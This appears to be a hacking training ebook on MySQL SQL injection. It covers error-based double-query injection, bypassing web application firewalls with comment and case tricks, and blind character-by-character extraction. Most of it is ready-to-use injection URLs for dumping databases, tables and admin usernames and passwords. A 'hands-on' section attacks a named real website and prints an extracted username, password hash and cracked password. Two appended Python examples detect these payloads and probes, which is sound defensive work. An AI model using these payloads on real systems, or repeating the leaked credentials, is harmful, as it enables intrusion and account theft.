SPECIAL EDITION
Ultra Hackers Training Kit
Y.Anto
For Ethical Hackers and Cyber Security Professionals
--Y.Anto

About the Author
Y.Anto is a writer, Hacker, Web designer, Network administrator, Phone application developer, Network Designer, Enterprise Administrator, Hardware technician, Cyber security expert, Engineering Student, Microsoft Student Partner, Intel Software Partner, Photographer and trainer. He has previously attended many international and national conferences, and his research was about securing IT: "The best way to hack is the best way to secure". Learn more about Anto by visiting his technical blog at http://anto2010.weebly.com. To watch more hacking multimedia content, visit his channel at http://www.youtube.com/universityofhacking or http://facek.com/universityofhacking, or http://www.youtube.com/W1Channel

Contents at a Glance
CHAPTER 1 DOUBLE QUERY BASED SQL INJECTION 1-21
CHAPTER 2 SQL INJECTION BYPASSING WAF 22-29
CHAPTER 3 TIME BASED BLIND SQL INJECTION 30-38
CHAPTER 1 DOUBLE QUERY BASED SQL INJECTION

Step 1
SQL Command
http://Victim.com/index.php?id=7+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
user info. Once the basic system info is grasped we can move on to grabbing tables, columns, and finally extracting data. In order to test for additional databases we first need to grab the count by altering the above request to:

Step 2
SQL Command
http://Victim.com/index.php?id=7+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables GROUP BY x)a)
Now that we have the count we can alter the above to use CONCAT and LIMIT to grab the name of each database available.

Step 3
SQL Command
http://Victim.com/index.php?id=7+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Now you will get a result like this.

Step 4
Once you have all the DB names you might want to find out the current user and confirm version info as well as some other basic details. This can be done using slight variations of our original query for the current database, which would look like this; notice that only the call in the middle is being altered.

SQL Command
http://Victim.com/index.php?id=7+and(select 1 FROM(select count(*),concat((select (select concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Step 5
User
SQL Command
http://Victim.com/index.php?id=7+and(select 1 FROM(select count(*),concat((select (select concat(user())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Now you will get a result like this.

Step 5
DATADIR
SQL Command
http://Victim.com/index.php?id=7+and(select 1 FROM(select count(*),concat((select (select concat(@@datadir)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Step 6
HOSTNAME
SQL Command
http://Victim.com/index.php?id=7+and(select 1 FROM(select count(*),concat((select (select concat(@@hostname)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Step 7
SQL Command
http://Victim.com/index.php?id=7+and(select 1 FROM(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=<HEX_VALUE_OF_DB_NAME>)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Step 8
SQL Command
http://Victim.com/index.php?id=7+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=<HEX_VALUE_OF_DB_NAME> LIMIT 1,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Now you will get a result like this.

You will need to hex-encode the DB name from which you are pulling table names, or it will not be processed properly. The same is true when pulling columns from tables, as we will do in the next step now that we have found some tables.

Step 9
SQL Command
http://Victim.com/index.php?id=7+and(select 1 FROM(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=<HEX_VALUE_OF_DB_NAME> AND table_name=<HEX_VALUE_OF_TABLE_NAME>)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Step 10
SQL Command
http://Victim.com/index.php?id=7+and(select 1 FROM(select count(*),concat((select (select (select distinct concat(cast(column_name as char)) FROM information_schema.columns WHERE table_schema=<HEX_VALUE_OF_DB_NAME> AND table_name=<HEX_VALUE_OF_TABLE_NAME> LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Step 11
Final process
SQL Command
http://Victim.com/index.php?id=7+and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,username,0x3a,password,0x3a,email,0x3a) FROM <TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)
Hands-on experience

Step 1
First you must pick a target site; here I targeted http://www.techvision.co.uk

Step 2
Check whether the site is vulnerable or not. In my case this site is vulnerable:
http://www.techvision.co.uk/news.php?id=45
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Step 3
Check the version of MySQL
http://www.techvision.co.uk/news.php?id=45+and+(select+1+from(select%0Acount(*),concat((select+concat(version())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
Step 4
Check the name of the database

Step 5
Find the name of the table
In the next step you must convert the name of the table to a hex value

Step 6
Find the name of the column present in the table

Step 7
Find the name of the column present in the table

Step 7
Final step
Duplicate entry 'debandy~9679ee7b0e7ddb35b34046a7c76e6e23~1' for key 1
9679ee7b0e7ddb35b34046a7c76e6e23 = l674300b
CHAPTER 2 SQL INJECTION BYPASSING WAF

Attacking steps
http://www.victim.com/index.php?id=777
No Errors
http://www.victim.com/index.php?id=777'
Errors
http://www.victim.com/index.php?id=777+ORDER+BY+1,2,3,4,5--
No Errors
http://www.victim.com/index.php?id=777+ORDER+BY+1,2,3,4,5,6--
Errors
http://www.victim.com/index.php?id=777+UNION+SELECT+1,2,3,4,5--
403 Forbidden
http://www.victim.com/index.php?id=-777+UNION+SELECT+1,2,3,4,5--
403 Forbidden

Now we will see if we can get past the WAF by using some comments to hide the parts of our statement that are most likely being filtered.
http://www.victim.com/index.php?id=777+UNION+SELECT+1,2,3,4,5--
403 Forbidden
http://www.victim.com/index.php?id=-777+UNION+SELECT+1,2,3,4,5--
403 Forbidden
http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,2,3,4,5--
No Errors
http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,CONCAT(database(),user(),version()),3,4,5--
403 Forbidden
Ok, so now we have commented out our UNION SELECT statement but something is still setting off the filters. It is most likely the CONCAT statement. In some cases it is possible to bypass filters simply by mixing up the case and retesting.
http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,ConCAt(database(),user(),version()),3,4,5--
No Errors
Version = 5.1.81-community
User = sample@localhost
Database() = sampled

Now you know the current database name, user name and version, as they are neatly displayed on the page for us. These two techniques can be combined to evade filters throughout your injections, as you will see. Now let us try to get the list of all the databases available, instead of just the current one.
http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GROUP_CONCAT(SCHEMA_NAME),3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--
403 Forbidden
http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(SCHEMA_NAME),3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--
No Errors
Information_Schema
sampleDB
http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
403 Forbidden again
http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+/*!INFORMATION_SCHEMA*/.TABLES--
No Errors
Now we have all of the tables for the current database displayed on the page without any 403 holding us back. Convert the table name to a hex value:
http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEMA*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e--
No Errors
id
pwd
mailid
http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(id,0x3a,pwd,0x3a,mailid,0x3a),3,4,5+FROM+Admin--
Now you will get id, mailid, pwd etc.
Other variants of the same comment trick:
/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
/*!union*/+/*!select*/+1,2,3--
/*!UnIOn*//*!SeLect*/+1,2,3--
un/**/ion+sel/**/ect+1,2,3--
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3--
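Seen from the defending side, every evasion in this chapter works because the filter matches the raw parameter while MySQL parses something else: it executes the body of /*!...*/, ignores ordinary comments, and does not care about case or a %0A line break. The following Python, an added example that is not from the book, normalizes a query-string value the way MySQL would read it and then applies signatures for the chapter 1 double-query pattern and the chapter 2 UNION evasions; the signature names, regexes and sample values are this example's own constructions, and treating ordinary comments as separators is its assumption about MySQL.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*!...*/ but skips ordinary /*...*/ comments
# (treated here as separators, which is the assumption this normalizer makes).
VERSIONED = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)
COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(value: str) -> str:
    """Reduce a raw query-string parameter to roughly what MySQL would parse."""
    s = unquote_plus(value)          # '+' and %0A become whitespace
    s = VERSIONED.sub(r" \1 ", s)    # keep the keyword hidden in /*!UNION*/
    s = COMMENT.sub(" ", s)          # drop /**/ and /*&id=*/ fillers
    return re.sub(r"\s+", " ", s).strip().lower()

# Signatures run on the normalized text (names are this example's own).
NORMALIZED_SIGS = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "double-query": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)"),
    "schema-read": re.compile(r"\binformation_schema\b|\bgroup_concat\s*\("),
    "fingerprint": re.compile(r"\bversion\s*\(|@@(?:version|datadir|hostname)\b"),
}
# Run on the raw value: a numeric id parameter never legitimately carries comments.
RAW_SIGS = {
    "versioned-comment": re.compile(r"/\*!"),
    "comment-in-param": re.compile(r"/\*.*?\*/", re.S),
}

def classify(value: str) -> list[str]:
    """Return the names of every signature the parameter value trips."""
    norm = normalize(value)
    hits = [name for name, rx in NORMALIZED_SIGS.items() if rx.search(norm)]
    return hits + [name for name, rx in RAW_SIGS.items() if rx.search(value)]

# Constructed sample values shaped like the chapter's requests (not captured traffic).
SAMPLES = {
    "benign": "777",
    "plain-union": "-777+UNION+SELECT+1,2,3,4,5--",
    "evasive-union": "-777+/*!UNION*/+/*!SELECT*/+1,ConCAt(database(),user(),version()),3,4,5--",
    "split-keywords": "un/**/ion+sel/**/ect+1,2,3--",
    "double-query": "45+and+(select+1+from(select%0Acount(*),concat((select+concat(version())"
                    "+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a"
                    "+from+information_schema.tables+group+by+a)b)",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label:15} -> {classify(value) or ['clean']}")
```

The split-keyword variant trips no keyword signature after normalization, which is why the raw comment check is kept as the catch-all.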
CHAPTER 3 TIME BASED BLIND SQL INJECTION

Steps to follow
First you must target any victim, for example
http://www.victim.com/index.php?id=777
Now you have the column count, but we will need to check the version.
http://www.victim.com/index.php?id=777' and substring(@@version,1,1)=4--+-
http://www.victim.com/index.php?id=777' and substring(@@version,1,1)=5--+-
5.0
Errors
Errors
Errors
No Errors
Now you will be using the TRUE/FALSE results to determine what columns are present in the table. It will work like this:
http://www.victim.com/index.php?id=777' and (select substring(concat(1,<insert-column-guess-here>),1,1) from <table-name> limit 0,1)=1--+-
No Errors
http://www.victim.com/index.php?id=777' and (select substring(concat(1,password),1,1) from admin limit 0,1)=1--+-
No Errors
Now that you have found the table name and associated column names we can actually extract some data. To extract, you will change the syntax slightly so that it takes advantage of ASCII/CHAR conversion. We will again analyze the results based on TRUE/FALSE responses. This part is very time consuming, as we have to get one letter at a time (as a CHAR value) and then convert it to the plain text that most people can identify with.
http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>65
http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>122
http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>100
http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>115
http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>112
http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>113
http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>111
As you can see, this can take some time. In the example above we would use some reasoning and determine that the char value is greater than 111 but less than 113. When we ran the test against 112 it indicated TRUE, meaning it is greater than OR equal to 112. If we convert this we get the letter "p". OK, so we have the first letter; now let's adjust our LIMIT at the end to move on to the second character position. We will also do our best to use our brains to speed things up and start guessing the next logical character to follow a "p", like maybe an "a". It now looks like this:
http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),2,1))>97
http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),2,1))>98
http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),3,1))>115
http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),3,1))>116
http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),4,1))>116
FALSE - indicating we have gone too far and found another "s" or
http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),4,1))>115
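Because this extraction needs many near-identical requests per character, it leaves a distinctive trail in the web server log: one client, one path, the same SELECT expression, and only the position and threshold changing. The Python below, an added defender-side example that is not part of the book, replays that sequence as constructed combined-format access-log lines and flags any client that issues a sustained run of such probes; the log lines, the IP address and the probe threshold are this example's own assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed combined-format access-log lines (not from the book) replaying the
# chapter's probes: the same SELECT every time, only position and threshold change.
PROBE = ('"GET /index.php?id=777%27+and+ascii(substring((SELECT+concat(username,0x3a,password)'
         '+from+users+where+userid=1),{pos},1))>{n} HTTP/1.1" 200 5120')
STEPS = [(1, 65), (1, 122), (1, 100), (1, 115), (1, 112), (1, 113), (1, 111), (2, 97), (2, 98)]
LOG_LINES = ['198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=777 HTTP/1.1" 200 5120'] + [
    f'198.51.100.7 - - [01/Jan/2024:10:00:{i:02d} +0000] ' + PROBE.format(pos=pos, n=n)
    for i, (pos, n) in enumerate(STEPS, start=1)
]

LOG_RX = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>[^ ?"]+)\??(?P<query>[^ "]*)')
# One boolean probe: ascii(substring((<expr>),<pos>,1)) <op> <n>
PROBE_RX = re.compile(
    r"ascii\s*\(\s*substring\s*\(\s*\((?P<expr>.*?)\)\s*,\s*(?P<pos>\d+)\s*,\s*1\s*\)\s*\)\s*[<>=]+\s*(?P<n>\d+)",
    re.I | re.S)

def find_blind_extraction(lines, min_probes=5):
    """Group probes by client, path and targeted expression; flag sustained sequences."""
    seen = defaultdict(list)
    for line in lines:
        m = LOG_RX.match(line)
        if not m:
            continue
        p = PROBE_RX.search(unquote_plus(m["query"]))   # %27 -> ', '+' -> space
        if p:
            seen[(m["ip"], m["path"], p["expr"])].append((int(p["pos"]), int(p["n"])))
    return [
        {"ip": ip, "path": path, "expr": expr, "probes": len(probes),
         "max_pos": max(pos for pos, _ in probes)}
        for (ip, path, expr), probes in seen.items() if len(probes) >= min_probes
    ]

if __name__ == "__main__":
    for alert in find_blind_extraction(LOG_LINES):
        print(alert)
```

The reported max_pos tells an incident responder how far along the targeted value the probing had reached when the log was cut.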